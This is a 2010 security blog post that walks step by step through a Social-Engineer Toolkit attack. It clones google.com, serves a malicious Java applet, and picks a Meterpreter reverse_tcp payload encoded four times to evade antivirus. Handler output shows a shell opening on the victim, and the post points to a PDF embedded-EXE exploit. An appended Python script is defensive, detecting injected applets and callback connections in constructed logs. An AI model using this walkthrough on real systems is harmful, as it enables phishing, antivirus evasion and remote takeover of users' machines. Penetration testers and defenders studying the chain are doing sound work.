Client Side exploits | netsecuritystuff
netsecuritystuff

Client Side exploits
Posted on February 10, 2010

Client side attacks have nowadays become a major focus when performing penetration tests. Once you forward an infected Word document or mail a PDF with a malicious executable attached, you can be sure that someone in the organisation will open it. Defending against such attacks at the perimeter alone has become practically impossible, because the payload arrives inside a document the user is expected to open; what you are really testing is the user, the client software and the egress path.

A while back Valsmith, Colin Ames and David Kerb released a great way to perform such client attacks at the Blackhat and Defcon conferences with the Metaphish paper and code: http://attackresearch.com/pub.html This brought a whole new aspect of using signed Java applets to attack clients and of attaching Metasploit payloads to PDF documents. Since then David Kennedy, of the Social-Engineer Framework (social-engineer.org), has produced a marvellous automated tool called SET (the Social-Engineer Toolkit). SET lets you perform all of the above attacks and more. One feature I love is the website cloning feature: combine it with an ARP redirect attack using ettercap and you could pwn all the clients during a pentest (with permission, of course). Imagine cloning a site as common as Google or Facebook and then performing a Java applet attack: total mass pwnage.

On BackTrack 4 final, SET lives at /pentest/exploits/SET/set.

Usage

I first mirrored google.com and moved it to /var/www/google/. A recursive wget will do (-r -l 1 -p fetches the front page together with the images and scripts it needs). wget writes the mirror into a directory named after the host, which is then moved into place:

    wget -r -l 1 -p http://www.google.co.ke/
    cp -r www.google.co.ke/ /var/www/
    cd /var/www/
    mv www.google.co.ke /var/www/google
    cd /pentest/exploits/SET/
    ./set

Select from the menu on what you would like to do:

    1. Automatic E-Mail Attacks (UPDATED)
    2. Website Java Applet Attack (UPDATED)
    3. Update Metasploit
    4. Update SET
    5. Create a Payload and Listener
    6. Help
    7. Exit the Toolkit

    Enter your choice: 2

Website Attack Vectors

    1. Let SET create a website for you
    2. Clone and setup a fake website (NEW)
    3. Import your own website (NEW)
    4. Return to main menu.

    Enter number: 3
    Enter your current IP Address: 192.168.20.1
    Enter the path to the website to be cloned: /var/www/google/

What payload do you want to generate:

    Name:                                   Description:
    1. Windows Shell Reverse_TCP            Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter      Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL          Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell                   Execute payload and create an accepting port on remote system.
    5. Windows Bind Shell X64               Windows x64 Command Shell, Bind TCP Inline
    6. Windows Shell Reverse_TCP X64        Windows X64 Command Shell, Reverse TCP Inline
    7. Windows Meterpreter Reverse_TCP X64  Connect back to the attacker (Windows x64), Meterpreter
    8. Import your own executable           Specify a path for your own executable

    Enter choice (example 1-4): 2

Below is a list of encodings to try and bypass AV. Select one of the below, Shikata_Ga_Nai is typically the best.

    1. avoid_utf8_tolower
    2. shikata_ga_nai
    3. alpha_mixed
    4. alpha_upper
    5. call4_dword_xor
    6. countdown
    7. fnstenv_mov
    8. jmp_call_additive
    9. nonalpha
    10. nonupper
    11. unicode_mixed
    12. unicode_upper
    13. alpha2
    14. No Encoding

    Enter your choice (enter for default): 2

Usually 1 to 4 does the trick; if you get an error message, some encoders don't like more than one. Specify 0 if you want.

    How many times do you want to encode the payload: 4
    Enter the PORT of the listener: 4444

    [-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
    .....................................
    ...................................

SET then launches msfconsole with a resource script that sets up the handler for the payload it just built:

    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 192.168.20.1
    LHOST => 192.168.20.1
    resource (src/program_junk/meta_config)> set LPORT 4444
    LPORT => 4444
    resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
    ENCODING => shikata_ga_nai
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    msf exploit(handler) >
    [*] Started reverse handler on 192.168.20.1:4444
    [*] Starting the payload handler...
    msf exploit(handler) >

The client goes to the fateful page http://192.168.20.1, gets the Google search page and runs the Java applet. Java must be installed on the client side, and the whole attack hinges on the user clicking Run in the Java security warning: the applet is not signed by a trusted CA, so the Java plugin asks before running it. Once accepted, the applet executes the payload and the stager connects back to the handler:

    msf exploit(handler) >
    [*] Sending stage (725504 bytes)
    [*] Meterpreter session 1 opened (192.168.20.1:4444 -> 192.168.20.4:1123)
    msf exploit(handler) > sessions

    Active sessions
    ===============

      Id  Description  Tunnel
      --  -----------  ------
      1   Meterpreter  192.168.20.1:4444 -> 192.168.20.4:1123

Note that the encoder only changes the bytes of the small stager that lands on the client; the Meterpreter stage itself (725504 bytes here) is pulled over the reverse TCP connection in the clear. An egress filter that does not allow port 4444 outbound, or a proxy that only passes HTTP, stops the session even when the anti-virus missed the executable.

Review a video here on the use of SET: http://vimeo.com/groups/33570/videos/8450443

SET will soon introduce version 0.4; with it you can even sign the Java applets yourself. Review a video here on the new version of SET: http://vimeo.com/9198233

Metasploit, on the other hand, has added a Java applet browser module to trunk, ranked excellent. I have tested it against Firefox and IE; it works wonders. For the Metasploit module there is a good tutorial to follow at PaulDotCom: http://pauldotcom.com/wiki/index.php/Episode185 The tutorial is easy to understand and follow. Also try out the clone feature in SET, which downloads the URL you give it and embeds the Java applet in it.

As for PDF attacks, the procedure is the same: try out the Adobe attacks, especially "Adobe PDF Embedded EXE Social Engineering" in SET; in Metasploit it is the exploit windows/fileformat/adobe_pdf_embedded_exe.

References:
http://www.attackresearch.com
http://www.social-engineer.org
http://pauldotcom.com
http://metasploit.com

Credits: David Kennedy, Valsmith, hdm and the Metasploit crew, Carlos Perez, the PaulDotCom crew, muts

Happy client side hacking
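Added example, not from the original post or from SET: the same chain seen from the defender's side. The three signals it checks are exactly the ones the walkthrough above produces: an applet tag injected into a page that claims to be Google, a .jar fetched from a bare IP address, and a client that pulled a .jar and shortly afterwards opened a non-web TCP connection back to the same server (192.168.20.4:1123 -> 192.168.20.1:4444 in the session output). The page body and both log extracts are constructed for the example; the log layouts, the applet class name and the jar name are assumptions, not SET's actual file names or any particular proxy's format.

```python
import ipaddress
import re
from datetime import datetime, timedelta
from html.parser import HTMLParser

# --- Constructed sample data (not real captures) -----------------------------
# A cloned front page with an applet injected before </body>. Class and jar
# names are placeholders, not the names SET uses.
CLONED_PAGE = """<html><head><title>Google</title></head><body>
<form action="/search"><input name="q"><input type="submit" value="Google Search"></form>
<applet code="Java.class" archive="Signed_Update.jar" width="1" height="1"></applet>
</body></html>"""

# Proxy log: time, client, method, URL, status (layout is an assumption).
PROXY_LOG = """\
2010-02-10T14:02:01 192.168.20.4 GET http://192.168.20.1/ 200
2010-02-10T14:02:01 192.168.20.4 GET http://192.168.20.1/Signed_Update.jar 200
2010-02-10T14:02:03 192.168.20.9 GET http://www.google.co.ke/ 200
2010-02-10T14:05:40 192.168.20.9 GET http://www.example.com/lib/app.jar 200
"""

# Firewall/flow log: time, src:port, dst:port, proto (layout is an assumption).
CONN_LOG = """\
2010-02-10T14:02:09 192.168.20.4:1123 192.168.20.1:4444 tcp
2010-02-10T14:02:10 192.168.20.9:1200 10.0.0.5:443 tcp
2010-02-10T14:06:30 192.168.20.9:1201 93.184.216.34:80 tcp
"""

WEB_PORTS = {80, 443, 8080}
URL_RE = re.compile(r"^https?://([^/:]+)(?::\d+)?(/.*)?$")


class AppletFinder(HTMLParser):
    """Collect the archive attribute of every <applet>/<object> tag."""

    def __init__(self):
        super().__init__()
        self.archives = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("applet", "object") and a.get("archive"):
            self.archives.append(a["archive"])


def find_applets(html):
    """Return the jar archives referenced by applet tags in a page body."""
    p = AppletFinder()
    p.feed(html)
    return p.archives


def _is_raw_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def jar_downloads(proxy_text):
    """(time, client, server) for every .jar fetched through the proxy."""
    out = []
    for line in proxy_text.splitlines():
        ts, client, _method, url, _status = line.split()
        m = URL_RE.match(url)
        if m and (m.group(2) or "").lower().endswith(".jar"):
            out.append((datetime.fromisoformat(ts), client, m.group(1)))
    return out


def raw_ip_jar_downloads(proxy_text):
    """Clients that pulled a jar from a bare IP, as the cloned site is served here."""
    return sorted({(c, s) for _t, c, s in jar_downloads(proxy_text) if _is_raw_ip(s)})


def correlate(proxy_text, conn_text, window_s=60):
    """Clients that fetched a jar from a server and, within window_s seconds,
    opened a non-web TCP connection to that same server: the applet ran and
    the reverse_tcp stager called home."""
    window = timedelta(seconds=window_s)
    conns = []
    for line in conn_text.splitlines():
        ts, src, dst, _proto = line.split()
        sip, _sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        conns.append((datetime.fromisoformat(ts), sip, dip, int(dport)))
    hits = set()
    for jar_ts, client, server in jar_downloads(proxy_text):
        for ts, sip, dip, dport in conns:
            if ((sip, dip) == (client, server) and dport not in WEB_PORTS
                    and jar_ts <= ts <= jar_ts + window):
                hits.add((client, server, dport))
    return sorted(hits)


if __name__ == "__main__":
    print("applets in cloned page:", find_applets(CLONED_PAGE))
    print("jars fetched from raw IPs:", raw_ip_jar_downloads(PROXY_LOG))
    print("jar download followed by callback:", correlate(PROXY_LOG, CONN_LOG))
```

The correlation deliberately ignores the port number the attacker chose: 4444 is only SET's default, so the rule keys on "same server, non-web port, shortly after the jar" rather than on a fixed port. The 192.168.20.9 client in the sample also fetched a jar, but from a hostname and with no follow-on connection to that host, so it is not reported; tune the window to the stager timings you actually see.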


2 Responses to Client Side exploits

Dexx says: February 12, 2010 at 2:35 pm

I like!

charles watathi says: February 12, 2010 at 4:38 pm

Welcome Dexx
